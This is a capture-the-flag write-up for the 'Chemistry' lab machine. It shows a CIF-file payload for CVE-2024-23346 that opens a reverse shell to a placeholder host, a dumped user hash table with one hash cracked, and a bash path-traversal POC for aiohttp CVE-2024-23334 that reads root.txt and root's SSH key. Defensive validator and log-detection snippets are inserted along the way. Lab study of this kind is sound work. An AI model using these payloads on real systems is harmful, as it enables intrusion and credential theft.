
Chemistry Writeup
March 5, 2025 ... about 6 minutes
The machine's IP is 10.10.11.38.
First, scan the ports to see which ones are open:
$ fscan -h 10.10.11.38 -p all
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-05 12:34:20] [INFO] 暴力破解线程数: 1
[2025-03-05 12:34:20] [INFO] 开始信息扫描
[2025-03-05 12:34:20] [INFO] 最终有效主机数量: 1
[2025-03-05 12:34:20] [INFO] 开始主机扫描
[2025-03-05 12:34:20] [INFO] 有效端口数量: 65535
[2025-03-05 12:34:20] [SUCCESS] 端口开放 10.10.11.38:22
[2025-03-05 12:34:20] [SUCCESS] 服务识别 10.10.11.38:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-03-05 12:34:45] [SUCCESS] 端口开放 10.10.11.38:5000
[2025-03-05 12:34:50] [SUCCESS] 服务识别 10.10.11.38:5000 =>
[2025-03-05 12:39:27] [INFO] 存活端口数量: 2
[2025-03-05 12:39:28] [INFO] 开始漏洞扫描
[2025-03-05 12:39:28] [INFO] 加载的插件: ssh
[2025-03-05 12:39:28] [SUCCESS] 扫描已完成: 1/1
Port 5000 hosts a website; after registering, a file upload page becomes visible.

The description states that only .CIF files can be uploaded, and an example file is provided.
A web search turns up CVE-2024-23346, which allows command execution by uploading a malicious .CIF file.
Download the POC from the project and try to get a reverse shell:
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/<IP>/<PORT> 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
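As an added defensive example (not code from the writeup or from pymatgen): the payload above works because vulnerable pymatgen versions evaluate the value of `_space_group_magn.transform_BNS_Pp_abc` as a Python expression, so an upload handler can reject any transform value that is not a plain crystallographic transform before the file ever reaches the parser. The key name comes from the payload; the benign and suspect sample files, and the allowlist pattern, are constructed here.

```python
import re

# CIF key whose value vulnerable pymatgen versions (CVE-2024-23346) evaluate as
# a Python expression while parsing symmetry transforms. This upload-side gate
# rejects anything that is not a plain crystallographic transform before the
# file reaches the parser; it complements upgrading pymatgen, not replaces it.
TRANSFORM_KEY = "_space_group_magn.transform_BNS_Pp_abc"

# A legitimate transform such as "a,b,c;0,0,0" or "-b,a,c;1/2,0,0" uses only
# axis letters, digits, fractions, signs and separators (assumed allowlist).
SAFE_TRANSFORM = re.compile(r"[abcxyz0-9+\-*/,;. ]+")

def _split_field(line):
    """Return (key, value) for a 'key value' CIF line, stripping outer quotes."""
    parts = line.strip().split(None, 1)
    key = parts[0]
    value = parts[1].strip() if len(parts) > 1 else ""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        value = value[1:-1]
    return key, value

def find_unsafe_transforms(cif_text):
    """List (line_no, key, reason) for every transform field failing the allowlist."""
    findings = []
    for no, line in enumerate(cif_text.splitlines(), 1):
        if not line.lstrip().startswith("_space_group_magn.transform"):
            continue
        key, value = _split_field(line)
        if key != TRANSFORM_KEY:
            findings.append((no, key, "unexpected transform key"))
        elif not SAFE_TRANSFORM.fullmatch(value):
            findings.append((no, key, "non-transform characters in value"))
    return findings

def accept_upload(cif_text):
    """Upload-handler gate: True only when no transform field is suspicious."""
    return not find_unsafe_transforms(cif_text)

# Constructed samples: a trimmed benign structure in the style of the example
# file, and the same file with a transform value carrying a Python attribute
# access (the kind of content an eval-based parser would act on).
BENIGN_CIF = """\
data_Example
_cell_length_a 10.00000
_symmetry_space_group_name_H-M 'P 1'
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
"""
SUSPECT_CIF = BENIGN_CIF.replace("'a,b,c;0,0,0'", "'a,b,c.__class__;0,0,0'")
```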
After uploading and executing the POC, a reverse shell comes back. Check /etc/passwd:
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
Looking through the website directory, there is a database.db file.

Download the database file and inspect it with the sqlite3 tool:
$ sqlite3 database.db
SQLite version 3.45.3 2024-04-15 13:34:05
Enter ".help" for usage hints.
sqlite> .tables
structure user
sqlite> select * from user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|hacker|d6a6bc0db10694a2d90e3a69648f3a03
16|111|202cb962ac59075b964b07152d234b70
This gives rosa's password hash; crack it with hashcat:
$ hashcat "63ed86ee9f624c7b14f1d4f43dc251a5" -m 0 -a 0 ./rockyou.txt
...
63ed86ee9f624c7b14f1d4f43dc251a5:unicorniosrosados
Log in over SSH as rosa and grab user.txt:
rosa@chemistry:~$ cat user.txt
45a1434fecffa90dc3bc6fce2cd5a519
Use fscan to scan the local ports:
rosa@chemistry:~$ ./fscan -h 127.0.0.1 -p all
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-05 06:28:10] [INFO] 暴力破解线程数: 1
[2025-03-05 06:28:10] [INFO] 开始信息扫描
[2025-03-05 06:28:10] [INFO] 最终有效主机数量: 1
[2025-03-05 06:28:10] [INFO] 开始主机扫描
[2025-03-05 06:28:10] [INFO] 有效端口数量: 65535
[2025-03-05 06:28:10] [SUCCESS] 端口开放 127.0.0.1:22
[2025-03-05 06:28:10] [SUCCESS] 服务识别 127.0.0.1:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.11 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11.]
[2025-03-05 06:28:10] [SUCCESS] 端口开放 127.0.0.1:5000
[2025-03-05 06:28:11] [SUCCESS] 端口开放 127.0.0.1:8080
[2025-03-05 06:28:16] [SUCCESS] 服务识别 127.0.0.1:5000 =>
[2025-03-05 06:28:17] [SUCCESS] 服务识别 127.0.0.1:8080 => [http]
[2025-03-05 06:28:20] [INFO] 存活端口数量: 3
[2025-03-05 06:28:20] [INFO] 开始漏洞扫描
[2025-03-05 06:28:20] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-05 06:28:20] [SUCCESS] 网站标题 http://127.0.0.1:8080 状态码:200 长度:5971 标题:Site Monitoring
There is another web service on port 8080 that is not exposed to the outside.
Use gost to forward port 8080 to port 2080:
rosa@chemistry:~$ ./gost -L tcp://:2080/127.0.0.1:8080
{"handler":"tcp","kind":"service","level":"info","listener":"tcp","msg":"listening on [::]:2080/tcp","service":"service-0","time":"2025-03-05T06:33:13.897Z"}

Use curl to inspect the web service:
$ curl -v 10.10.11.38:2080
* Trying 10.10.11.38:2080...
* Connected to 10.10.11.38 (10.10.11.38) port 2080
> GET / HTTP/1.1
> Host: 10.10.11.38:2080
> User-Agent: curl/8.7.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 5971
< Date: Wed, 05 Mar 2025 06:34:16 GMT
< Server: Python/3.9 aiohttp/3.9.1
Searching for Python/3.9 aiohttp/3.9.1 shows the path traversal vulnerability CVE-2024-23334, and the version matches (aiohttp <= 3.9.1).
Download the POC and adjust its parameters; here the static file path is /assets/:
#!/bin/bash
url="http://10.10.11.38:2080"
string="../"
payload="/assets/"
file="root/root.txt" # without the first /
for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done
Run the POC to get root.txt:
$ bash poc.sh
[+] Testing with /assets/../root/root.txt
Status code --> 404
[+] Testing with /assets/../../root/root.txt
Status code --> 404
[+] Testing with /assets/../../../root/root.txt
Status code --> 200
158445368c21e502698c7bba3dac50fb
root.txt obtained.
To log in as the root user, the POC can also fetch the /root/.ssh/id_rsa private key, which then allows SSH login:
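As an added defensive example (not the POC and not aiohttp's code): the containment check a static-file route needs so that a request like /assets/../../../root/root.txt cannot map outside the static directory, plus a scan over access-log lines that flags the probe sequence the POC above produces. The /assets/ prefix comes from the writeup; the static root and the log lines (written in the style of aiohttp's default access-log format) are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

STATIC_PREFIX = "/assets/"       # the static route the POC targets (from the writeup)
STATIC_ROOT = "/opt/app/static"  # assumed on-disk static directory (constructed)

def static_target(url_path):
    """Normalise the part of a request path after STATIC_PREFIX onto STATIC_ROOT."""
    rel = unquote(url_path[len(STATIC_PREFIX):]).lstrip("/")
    return posixpath.normpath(posixpath.join(STATIC_ROOT, rel))

def resolve_static(url_path):
    """Return the on-disk path, or None when the request escapes STATIC_ROOT.

    String normalisation only; a real handler must also realpath() the result
    so a symlink inside the root cannot point outside it (the aiohttp issue
    concerned its follow_symlinks=True mode, which skipped this validation).
    """
    if not url_path.startswith(STATIC_PREFIX):
        return None
    target = static_target(url_path)
    if target != STATIC_ROOT and not target.startswith(STATIC_ROOT + "/"):
        return None
    return target

# Constructed access-log lines (not from the box), mirroring the probe
# sequence the POC emits plus a URL-encoded variant that must be decoded first.
SAMPLE_LOG = """\
10.10.16.17 [05/Mar/2025:06:40:01 +0000] "GET /assets/style.css HTTP/1.1" 200 1234 "-" "curl/8.7.1"
10.10.16.17 [05/Mar/2025:06:40:02 +0000] "GET /assets/../root/root.txt HTTP/1.1" 404 0 "-" "curl/8.7.1"
10.10.16.17 [05/Mar/2025:06:40:03 +0000] "GET /assets/../../../root/root.txt HTTP/1.1" 200 33 "-" "curl/8.7.1"
10.10.16.17 [05/Mar/2025:06:40:04 +0000] "GET /assets/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2001 "-" "curl/8.7.1"
"""
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def flag_traversal(log_text):
    """Return (path, status, escaped_to) for requests that break out of the root.

    A 200 next to an escaped path means the server actually served the file.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, status = m.group(1), int(m.group(2))
        if path.startswith(STATIC_PREFIX) and resolve_static(path) is None:
            hits.append((path, status, static_target(path)))
    return hits
```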
$ bash poc.sh
[+] Testing with /assets/../root/.ssh/id_rsa
Status code --> 404
[+] Testing with /assets/../../root/.ssh/id_rsa
Status code --> 404
[+] Testing with /assets/../../../root/.ssh/id_rsa
Status code --> 200
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
Log in as root with the private key:
$ ssh -i root_rsa root@10.10.11.38
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Wed 05 Mar 2025 06:46:07 AM UTC
System load: 0.0
Usage of /: 81.8% of 5.08GB
Memory usage: 32%
Swap usage: 0%
Processes: 253
Users logged in: 2
IPv4 address for eth0: 10.10.11.38
IPv6 address for eth0: dead:beef::250:56ff:feb9:d92f
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Mar 5 04:46:52 2025 from 10.10.16.17
root@chemistry:~# id
uid=0(root) gid=0(root) groups=0(root)